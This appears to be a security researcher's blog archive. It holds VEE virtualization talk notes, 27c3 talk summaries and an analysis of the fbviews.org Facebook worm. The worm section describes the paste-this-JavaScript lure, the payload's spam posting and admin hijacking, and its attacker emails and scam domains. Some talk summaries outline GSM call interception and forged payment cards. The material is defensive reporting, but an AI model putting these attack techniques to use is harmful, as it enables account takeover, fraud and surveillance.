Virtual WiFi: Bring Virtualization from Wired to Wireless (Highlight) (Lei Xia, Sanjay Kumar, Xue Yang, Praveen Gopalakrishnan, York Liu, Sebastian Schoenberg and Xingang Guo, Northwestern University)

New approach to virtualization that enables wifi virtualization. One phyisical WiFi interface is virtualized and can be used in multiple VMs. Current approach is to virtualize an ethernet device inside the GuestVM. This strips all the wifi functionality. The new approach virtualizes complete wifi functionalities in the VM. The same Intel Wifi driver is used in the GuestVM as is used in the HostVM. Each VM gets its own vMAC, HostVM distributes packets according to vMAC, all other capabilities are directly forwarded to the VMs and can be set by the VMs as well.

Questions: Promiscuous? Rate limited? Multiple vMACs supported in VM as well?

SymCall: Symbiotic Virtualization Through VMM-to-Guest Upcalls (Jack Lange and Peter Dinda)

SemanticGap: loss of semantic information between HW and emulated guest HW and guest OS state is unkown to VMM. Two approaches to find out about guest: BlackBox: Monitor external guest interactions, GrayBox: reverse engineer guest state.

Symbiotic Virtualization: design both the guest OS and the VMM to minimize the semantic gap. But also offer a fallback to blackbox guest OS. SymSpy passive interface uses asynchronous communication to get information about hidden state and SymCall that uses upcalls into the guest during exit handling.

SymSpy: uses a shared memory page between the OS and the VMM to offer structured data exchange between VMM and OS
SymCall: similar to system calls. The VMM requests services from the OS.
Restrictions: only 1 SymCall active at a time, SymCalls run to completition (no blocking, no context switches, no exceptions or interrupts), SymCalls cannot wait on locks (deadlocks).

SwapBypass is an optimization that pushes swapping from the guest to the VMM. SwapBypass uses a shadow copy of the page tables of the guest VM. The VM does not swap out any pages and caching/swapping only happens in the VMM but never in the guest VM to reduce I/O pollution. Page fault happens in VMM and not in host.

Session 7: Memory Management

Overdriver: Handling Memory Overload in an Oversubscribed Cloud (Highlight) (Dan Williams, Hani Jamjoom, Yew-Huey Liu and Hakim Weatherspoon, Cornell University)

Peak loads are very rare and utilization in data centers is below 15%. But on the other hand peak loads are unpredictable and oversubscription can lead to overload. Memory oversubscription is kind of critical because overload carries a high penalty due to swapping costs. The focus of this work is to research if the performance degradation due to memory overload can be managed, reduced, or eliminated.

Analysis of different memory overloads shows that most overload is transient (96% are less than 1min), some overload is sustained (2% last longer than 10min). Two techniques used to address memory overload: VM migration (migrates VM to another machine), and network memory that sends swapped pages not to disk but to another swapping machine over the network. Network Memory may be used for transient overloads and VM migration for sustained overloads.

OverDriver uses network memory and VM migration to handle overload. OverDriver collects swap/overload statistics for each VM. Use overload profiles to decide when to switch from network memory to VM migration. Question: Decision on when to migrate is static, what about adaptive checks/analysis for migration? What other predictors could you use? (Sounds like future work)

Selective Hardware/Software Memory Virtualization (Xiaolin Wang, Jiarui Zang, Zhenlin Wang, Yingwei Luo and Xiaoming Li, Peking University)

3 possibilities for memory virtualization: MMU para-virtualization, shadow page tables, and EPT/NPT. Idea: use dynamic switching between hardware assisted paging and shadow paging. Question: how and when to switch?

Hybrid Binary Rewriting for Memory Access Instrumentation (Highlight; Read paper) (Amitabha Roy, Steven Hand and Tim Harris, University of Cambridge UK)

Scaling inside multi-threaded shared memory programs can be problematic (scalability, races, atomicity violations). Run existing x86 binaries and analyze synchronization primitives (locks). Dynamic binary rewriting used to analyze lock primitives.

Hard to decide statically if lock is taken or not. Either overinstrumentation or unsound. Therefore dynamic BT is needed. Hybrid binary rewriting uses static binary rewriting and dynamic binary rewriting as a fallback. A persistanc instrumentation cache (PIC) is stored between different runs of the same program. So the translated code can be reused.

HBR used for two case-studies:

Profiling: interested in understanding how suitable programs are for applying STM transformations.
Speculative Lock Elision: remove locks and turn them into stm_start, stm_commit, and instrument reads and writes. STAMP used to evaluate this dynamic instrumentation. Problem is that STAMP uses private data that is accessed inside transactions and there is manual optimization for STMs that get rid of the additional read and write operations. Dynamic instrumentation instruments all reads and writes and has bad performance for these cases. Private Data Tracking uses a special tracking of private data to reduce the amount of instrumentation and reduces the overhead to reasonable numbers.

Question: Static binary rewriting: no runtime overhead (no translation overhead), but there can be artifacts/overhead through the translation process. Translation overhead for DBT is <1% What about hierarchical transactions?

Peek into the future:

VEE 2012 will be in London, UK, general chair will be Steve Hand. VEE'12 is colocated with ASPLOS again, Saturday 3rd of March and Sunday 4th of March.

27c3 - 27th Chaos Communication Congress in Berlin (2010-12-27 to 2010-12-30)

2011-02-28T10:08:00-05:00

For the 7th time in a row Stormbringer and I visited the Chaos Communication Conference in Berlin. It was fun as always, I had my second talk about libdetox and we were able to drink many beers and I also listened to some interesting talks. A writeup about the different talks follows:

Day 1

Rop Gongrijp: 27C3 Keynote - We come in Peace Rop talks about Wikileaks, free speach, journalism and how unhappy people can be used to change the world. An angry energy is needed to change something. Although we come in peace it is important to use our unhappiness to change something.

Branko Spasojevic: Code deobfuscation by optimization Static binary translation is used to remove obfuscation. Basic blocks are merged and false conditional jumps are removed using static flag tracking. This approach is very limited as no dynamic data is checked.

Dominik Herrmann lexi: Contemporary Profiling of Web Users - On Using Anonymizers and Still Get Fucked Distinguish individual anonymized web users using the set of hosts they access. Use machine learning and patterns to differentiate between individual users. Find bots that access weird patterns. Solution to hide from these analyses: Use additional background web-traffic that obfuscates real traffic.

Felix Gröbert: Automatic Identification of Cryptographic Primitives in Software Use PIN on windows to analyze malware and automatically find crypto blocks inside the application. Generate execution trace with all executed instructions. Categorize cryptographic algorithms and select instruction combinations that are used by these algorithms. Search for these instructions, search for loops and categorize crypto.

Collin Mulliner Nico Golde: SMS-o-Death - From analyzing to attacking mobile phones on a large scale. Get large collection of phones, get baseband station, get a faraday cage and start fuzzing SMS to kill phones.

Peter Stuge: USB and libusb - So much more than a serial port with power How to handle USB devices and how to use libUSB. New findings for USB1 / 2 / 3

vanHauser: Recent advances in IPv6 insecurities Bruce Dang Peter Ferrie: Adventures in analyzing Stuxnet A Microsoft-take on analyzing malware. Insights into the structure of malware decompilation. Description of all the 0day exploits used in Stuxnet. (And yes, the exploits are really embarrassing for Microsoft). Great talk!

Alien8 Astro: Pentanews Game Show - Your opponents will be riddled as well Game show with nerd questions. Most of them too easy.

Day 2

Michael Steil: Reverse Engineering the MOS 6502 CPU - 3510 transistors in 60 minutes Interesting talk about the MOS 6502 CPU (used in Nintendos, Apple II and so on).

Karsten Nohl Sylvain Munaut: Wideband GSM Sniffing Use super cheap mobile phones (4 of them) to sniff GSM communications. Use SMS routing information to get location of target phone, find cell, get close to target phone (to the same cell), decrypt TMSI - temporary session key, wait for call, decrypt call using rainbow tables. BAM, cheap surveillance.

Karsten Becker Robert Boehme: Part-Time Scientists - One year of Rocket Science! Nerds trying to get to the moon. They already built the rover and are now building the lander. Nice pictures and some information about how to get to the moon and what to do if you are only a part-time scientist.

FX of Phenoelit: Building Custom Disassemblers - Instruction Set Reverse Engineering Inside of the Stuxnet code there was a lot of SS7 code that is used for Siemens Controllers. FX developed a disassembler for these machine codes using a free version of the Siemens compilers. He reverse engineered the complete tool-chain and verified that parts of the code were disassembled correctly. He also showed bugs in the Siemens disassemblers and how to hide hand-written code from the Siemens disassemblers.

Andreas Bogk: Defense is not dead - Why we will have more secure computers - tomorrow Talks about the SAFE computer of the DoD. Use type-safe languages with a garbage collector to reduce bugs. Use type-checking and type-guarantees even on operating-system level. Construct additional hardware that type-checks all objects as well.

Daniel J. Bernstein: High-speed high-security cryptography: encrypting and authenticating the whole Internet Get rid of DNSSEC and encrypt every single communication. Use UDP instead of TCP and move everything to a secure protocol. New protocol, new form of DNS, view from the perspective of a cryptographer.

Ralf-Philipp Weinmann: The Baseband Apocalypse - all your baseband are belong to us

Ralf-Philipp Weinmann: The Hidden Nemesis - Backdooring Embedded Controllers

Day 3

bushing marcan sven: Console Hacking 2010 - PS3 Epic Fail How to hack secure crypto systems and how to break the chain of trust. Finding bugs in console software... They had a couple of nice exploits to get around the software security system of modern consoles and showed a way how they could install and develop homebrew software on modern PS3 consoles.

Henryk Plötz Milosch Meriac: Analyzing a modern cryptographic RFID system - HID iClass demystified Use old legacy information about RFID to crack the new cards. Use holes in crypto systems or wrong implementations to escalate privileges.

Harald Welte Steve Markgraf: Running your own GSM stack on a phone - Introducing Project OsmocomBB Get old and cheap phones, crack level 1 software and use a serial line to control the phone. Implement 2nd, 3rd, and higher levels in software. Make calls and send texts in a complete open-source and free implementation.

Steven J. Murdoch: Chip and PIN is Broken - Vulnerabilities in the EMV Protocol

Harald Welte: Reverse Engineering a real-world RFID payment system - Corporations enabling citizens to print digital money Free money in Taiwan. They use the Mifare system for public transport and for small payments. They use a card-only validation scheme that relies on the security of the card only. All state is safed on the customer card. Generate your own card with your individual amount of money on that card. Get free stuff.

Felix von Leitner Frank Rieger: Fnord-Jahresrückblick 2010 - von Atomausstieg bis Zwangsintegration Genial wie immer. Spassiger Jahresrueckblick.

Damien M: illescamps Julien Vanegue: Zero-sized heap allocations vulnerability analysis - Applications of theorem proving for securing the windows kernel

Ray Stefan 'Sec' Zehl: Hacker Jeopardy - Number guessing for geeks Fun as always :)

Juergen Pabel: FrozenCache - Mitigating cold-boot attacks for Full-Disk-Encryption software

Day 4

Julia Wolf: OMG WTF PDF - What you didn't know about Acrobat Security holes in the PDF parser. Find problems and discrepancies in different PDF parsers. A PDF can be hidden in a ZIP that can be hidden in an EXE file. Stack different types and get around the protection of AV products.

maha/Martin Haase: Ich sehe nicht, dass wir nicht zustimmen werden - Die Sprache des politischen Verrats und seiner Rechtfertigung Stilistische Tricks ueber Sprache, Politik und Umgebung

Sergey: Hackers and Computer Science Sergey talks about the hacker culture and hacker ethics in general. Nice easy-listening talk about the nerd/hacker culture.

kornau: A framework for automated architecture-independent gadget search - CCC edition Automatically find gadgets in programs for return to libC attacks. Finds function tails that can be used as new gadgets. Also checks half-instructions (e.g., jumping into an instruction to get a different, unintended instruction).

Lars Weiler: Data Analysis in Terabit Ethernet Traffic - Solutions for monitoring and lawful interception within a lot of bits Product show of different black boxes. Connect multiple network ports to black boxes. Black boxes filter and drop lots of traffic. Remaining data can be analyzed by normal PC / analysis machine.

The fbviews.org worm or how to collect user data and make money

2011-02-21T14:04:00-05:00

A couple of hours ago I read a post from a friend on Facebook that said "Secret tool shows who stalks your pics". The text was followed by a shortened link (tweet, anyone?). As I opened the link (in an incognito browser window of course) I was greeted by instructions to copy some JavaScript code into my address bar.

Hm, this smells phisy... The JavaScript that one has to copy to the address bar crates a script element that downloads a JavaScript file from some drop-box and executes that JavaScript file. So the next thing I did was to download script. Well, the script was (somewhat) obfuscated as many/most function names were replaced with array accesses and all strings used in the code were placed in the array as well. The array is stored as raw-hex-values. So I decoded the values and de-obfuscated the JavaScript. The JavaScript does the following:

Display a nice message that it is analyzing your profile (and your stalkers)
Posts a (spam) message to your wall (with a random message and a link to the tool)
Adds you to the group "Music Makes me High." (127901437283104)
Adds you to the group "I Hate it when I can't fall asleep because I'm thinking." (165991450116555)
Adds you to the event with the number 168046893242650 * I was unable to access this event - it might have been deleted
Finds 15 of your friends and posts to a (spam) message their wall (another random message)
Checks all your registered entries/pages for "Facebook Insights" and (i) adds two new admin email addresses (lethaburbach890 AT yahoo.com and wintersaccohoqr AT hotmail.com) (ii) writes a (spam) message to the wall of the page
Redirects you to a page that shows some fake results and tries to get you to fill out some "Human Verification tests". I assume that's where they make the money.

So if you got tricked by this worm try to delete all messages, leave the two groups that you were added into and check all your pages and remove redundant admins!

What are the details from the code analysis:

The following functions are available:

_88xuhyr: decrypts an array of values and executes the resulting string as JavaScript
addAdmin: adds a new admin to a pageid in Facebook Insights
makePost: writes a post to a friends wall
update: fire the Ajax request
loading: display an image to calm the user

The original code was somewhat weird, two functions (addAdmin, makePost, and update) were defined two times (looks like a copy-paste error before the obfuscation)

A function (_88xuhyr) is not used in the source code. It apperas as if they intended to obfuscate the code even further but forgot about it.

makePost has unused arguments

The following messages are used to generate spam messages:

Wow! Seems like lots of people stalk me - http://goo.gl/lfDvG
New FB tool shows who stalks your profile-- http://goo.gl/NHAlt
Secret tool shows who stalks your pics http://tinyurl.com/48jd66w
Insane! Awesome tool to see who looks at your pics http://goo.gl/3Nt6T
According to http://ow.ly/3Zy2Z you're my top stalker. Creep.
Secret tool shows who stalks your pics - http://goo.gl/NMclq

The possible subjects are:

Check this out!
Hey, whats happening?
Hey! This is awesome

The final landing pages are:

http://goo.gl/lfDvG -> http://thefbcreeper.info/
http://goo.gl/NHAlt -> http://profileviewers.info/
http://tinyurl.com/48jd66w -> http://thefbcreeper.info/
http://goo.gl/3Nt6T -> http://profilechecker.info/
http://ow.ly/3Zy2Z -> http://valcreepers.tk/
http://goo.gl/NMclq -> http://profilechecker.info/

Another fun fact is, that all landing pages use the same Google Analytics account (UA-21407597-1) for the domain .fbviews.org.

When the script finishes it redirects the user to a landing page on fbviews.org (http://fbviews.org/result.php) that display some fake results and tries to trick the user into entering some data.

The worm is a nice peace of JavaScript code that is somewhat obfuscated and tries to spread on Facebook. It would be interesting to get to the data that is stored in this Google Analytics account. According to the pages were the users are automatically added more than 16k people have already fallen for that trap (and counting).

Random ramblings of a security nerd

RIP Niklaus Wirth

37c3: Chaos returning to Hamburg

Day 1: Familiarization

Day 2: Exploration

Day 3: Exploitation

Day 4: Departation

Writing (successful) ERC grants in Europe

Second factor on VPNs considered harmful

TOTP: Time-based One Time Password

Cloning TOTPs

PhD at EPFL, in Europe

A PhD forms a long term professional relationship

Salary and fixed costs

Day to day life

PhD research and EDIC requirements

Fellowship versus Admissible

Interactions in the HexHive lab

Further reading

Positive reviewing in software security

Expedia: from software bug to customer service nightmare, a modern Odyssey

Act 1: Expedia.com: May 9

Act 2: Expedia.com: May 20

Act 3: Expedia.ch: May 23

Act 4: Expedia.de: May 28

Act 5: Expedia.de: May 28

Act 6: Expedia.de: May 28

Act 7: Expedia.com: May 29

Act 8: Expedia.com: May 29

Act 9: Expedia.com: May 29

Act 10: Expedia.com: May 30

Act 11: Expedia.com: May 30

Act 12: Expedia.com: May 31

Act 13: Expedia.com: May 31

Act 14: Expedia.ch: June 1

Act 15: Expedia.ch: June 1

Act 16: Expedia.ch: June 2

Act 17: Expedia.com: June 2

Act 18: Expedia.ch: June 3

Act 19: Expedia.com: June 6

Act 20: Expedia.com: June 10

Act 21: Expedia.ch: June 11

Act 22: Expedia.com/ch: June 13

Act 23: Expedia.??: June 13

Act 24: Expedia.com: June 14

Act 25: Expedia.com: June 17

Act 26: Expedia.ch: June 18

Act 27: Expedia.com: June 20

Act 28: Expedia.ch: June 23

Act 29: Expedia.ch: June 29

Act 30: Expedia.com/ch: July 1

Final act

How to install a Canon MF633Cdw on a modern Debian

The Fuzzing Hype-Train: How Random Testing Triggers Thousands of Crashes

Input generation

Execution engine

Coverage wall

Evaluating fuzzing

A call for future work

References

SMoTherSpectre: transient execution attacks through port contention

Simultaneous multi-threading and scheduling

SMoTher

SMoTherSpectre

Gadgets

Evaluation

OpenSSL exploit

Mitigation

Disclosure

Milkomeda: colliding galaxies or how to repurpose security checks across domains

New usage scenarios result in new threats

WebGL: exposing ioctl to JavaScript

Android GPU security

Milkomeda: reuse checks

Automating data-only attacks through Block Oriented Programming (BOP)

SPL payload

Finding BOP gadgets

Functional blocks

Dispatcher blocks

Implementation and evaluation

WebGL: exposing `ioctl` to JavaScript